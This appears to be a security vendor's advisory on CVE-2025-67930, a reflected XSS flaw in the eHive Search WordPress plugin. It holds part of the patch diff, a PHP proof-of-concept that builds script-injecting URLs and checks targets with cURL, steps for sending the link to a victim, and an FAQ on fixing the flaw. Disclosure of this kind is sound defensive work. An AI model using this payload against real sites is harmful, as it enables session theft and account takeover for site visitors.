+	echo '<a href="'.esc_url($eHiveAccess->getObjectDetailsPageLink($objectRecord->objectRecordId)).'"><span class="ehive-item-summary">'.esc_html(listFields($options, $objectRecord)).'</span></a>';

 	if ( $showPublicProfileName ) {
 		echo '<p class="ehive-field ehive-identifier-public_profile_name">';
 		echo '<span class="ehive-field-label">From: </span>';
-		echo '<a href="'.$eHiveAccess->getAccountDetailsPageLink($objectRecord->account->accountId).'">'.$objectRecord->account->publicProfileName.'</a>';
+		echo '<a href="'.esc_url($eHiveAccess->getAccountDetailsPageLink($objectRecord->account->accountId)).'">'.esc_html($objectRecord->account->publicProfileName).'</a>';
 		echo '</p>';
 	}

@@ -340,7 +357,6 @@
 				break;
 		}
 	}
-
 }

 function listFields($options, $objectRecord) {

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC

// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept
// CVE-2025-67930 - eHive Search <= 2.5.0 - Reflected Cross-Site Scripting

<?php
/**
 * Proof of Concept for CVE-2025-67930
 * Reflected XSS in eHive Search WordPress Plugin <= 2.5.0
 *
 * Usage: php cve-2025-67930-poc.php --url https://vulnerable-site.com
 *
 * This script demonstrates the reflected XSS vulnerability by generating
 * a malicious URL with a JavaScript payload in the eHive_query parameter.
 * The payload triggers when a victim visits a page with the [ehive_search] shortcode.
 */

// Configuration
$target_url = ''; // Set via command line argument

// Parse command line arguments
$options = getopt('', ['url:']);
if (isset($options['url'])) {
    $target_url = rtrim($options['url'], '/');
} else {
    echo "Usage: php " . basename(__FILE__) . " --url https://target-site.comn";
    exit(1);
}

// XSS payload - simple alert to demonstrate execution
$payload = '<script>alert("Atomic Edge Research - XSS via eHive Search");</script>';

// URL encode the payload for use in query string
$encoded_payload = urlencode($payload);

// Construct the malicious URL
// The plugin uses 'eHive_query' as default query parameter
$malicious_url = $target_url . '/?eHive_query=' . $encoded_payload;

// Alternative: Use the page parameter if query_var option was changed
$malicious_url_page = $target_url . '/?eHive_page=' . $encoded_payload;

echo "================================================================n";
echo "Atomic Edge CVE-2025-67930 Proof of Conceptn";
echo "================================================================nn";
echo "Target URL: $target_urln";
echo "Vulnerable Plugin: eHive Search <= 2.5.0n";
echo "Vulnerability: Reflected Cross-Site Scriptingnn";

echo "[+] Primary Attack Vector (Search Query):n";
echo "    $malicious_urlnn";

echo "[+] Secondary Attack Vector (Page Parameter):n";
echo "    $malicious_url_pagenn";

echo "[+] Exploitation Instructions:n";
echo "    1. Ensure the target site has eHive Search plugin <= 2.5.0 installedn";
echo "    2. Verify a page contains the [ehive_search] shortcoden";
echo "    3. Send the malicious URL to a victimn";
echo "    4. When victim visits the URL, JavaScript executes in their browsernn";

echo "[+] Testing with cURL (simulates victim visit):n";
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $malicious_url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
curl_setopt($ch, CURLOPT_USERAGENT, 'Mozilla/5.0 (Atomic Edge Security Scanner)');
$response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);

if ($http_code == 200) {
    // Check if payload appears in response (unsanitized)
    if (strpos($response, $payload) !== false) {
        echo "    ✓ VULNERABLE - Payload found in response (unsanitized)n";
        echo "    ✓ The site is running vulnerable version <= 2.5.0n";
    } else if (strpos($response, htmlspecialchars($payload)) !== false) {
        echo "    ✓ PATCHED - Payload is HTML encoded in responsen";
        echo "    ✓ The site is running patched version >= 2.5.1n";
    } else {
        echo "    ? INCONCLUSIVE - Could not determine plugin statusn";
        echo "    ? The page may not contain the [ehive_search] shortcoden";
    }
} else {
    echo "    ✗ ERROR - HTTP $http_code receivedn";
}

echo "n[+] Mitigation:n";
echo "    • Upgrade to eHive Search plugin version 2.5.1 or latern";
echo "    • Implement the ModSecurity rule provided by Atomic Edgen";
?>

Frequently Asked Questions

What is CVE-2025-67930?
Understanding the vulnerability
CVE-2025-67930 is a reflected cross-site scripting (XSS) vulnerability found in the eHive Search plugin for WordPress, affecting versions up to and including 2.5.0. It allows unauthenticated attackers to inject arbitrary JavaScript into web pages, which can execute if a user interacts with a malicious link.
How does the vulnerability work?
Mechanism of exploitation
The vulnerability arises from insufficient input sanitization and output escaping in the plugin’s search functionality. Attackers can craft malicious URLs containing JavaScript payloads that execute in the victim’s browser when they click on a link.
Who is affected by this vulnerability?
Identifying at-risk users
Any WordPress site using the eHive Search plugin version 2.5.0 or earlier is at risk. Administrators should check their plugin version to determine if they need to take action.
How can I check if my site is vulnerable?
Version verification
To check if your site is vulnerable, verify the version of the eHive Search plugin installed. If it is version 2.5.0 or earlier, your site is at risk and should be updated immediately.
How can I fix this vulnerability?
Updating the plugin
The vulnerability is patched in version 2.5.1 of the eHive Search plugin. Update to this version or later to mitigate the risk of exploitation.
What does the CVSS score of 6.1 indicate?
Understanding severity levels
A CVSS score of 6.1 indicates a medium severity vulnerability. This means that while it is not the most critical threat, it still poses a significant risk, especially if exploited in conjunction with other vulnerabilities.
What are the practical risks of this vulnerability?
Potential impacts of exploitation
Exploitation of this vulnerability can lead to session hijacking, account takeover, content manipulation, or redirection to malicious sites. Attackers can execute arbitrary JavaScript in the victim’s browser context.
What is the proof of concept for this vulnerability?
Demonstrating the exploit
The proof of concept involves generating a malicious URL with a JavaScript payload in the ‘eHive_query’ parameter. When a victim visits this URL, the payload executes, demonstrating the reflected XSS vulnerability.
What steps should I take if my site is compromised?
Responding to an incident
If your site is compromised, immediately update the eHive Search plugin to the patched version. Review your site’s security logs, change passwords, and consider restoring from a clean backup.
Are there any additional security measures I should take?
Enhancing overall security
In addition to updating the plugin, consider implementing a web application firewall, regularly scanning your site for vulnerabilities, and educating users about the risks of clicking on unknown links.
How can I prevent similar vulnerabilities in the future?
Best practices for security
To prevent similar vulnerabilities, ensure all plugins and themes are regularly updated, use reputable sources for plugins, and implement security best practices such as input validation and output escaping in custom code.
Where can I find more information about this vulnerability?
Resources for further reading
More information about CVE-2025-67930 can be found on the National Vulnerability Database (NVD) and security advisories from the WordPress community.

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations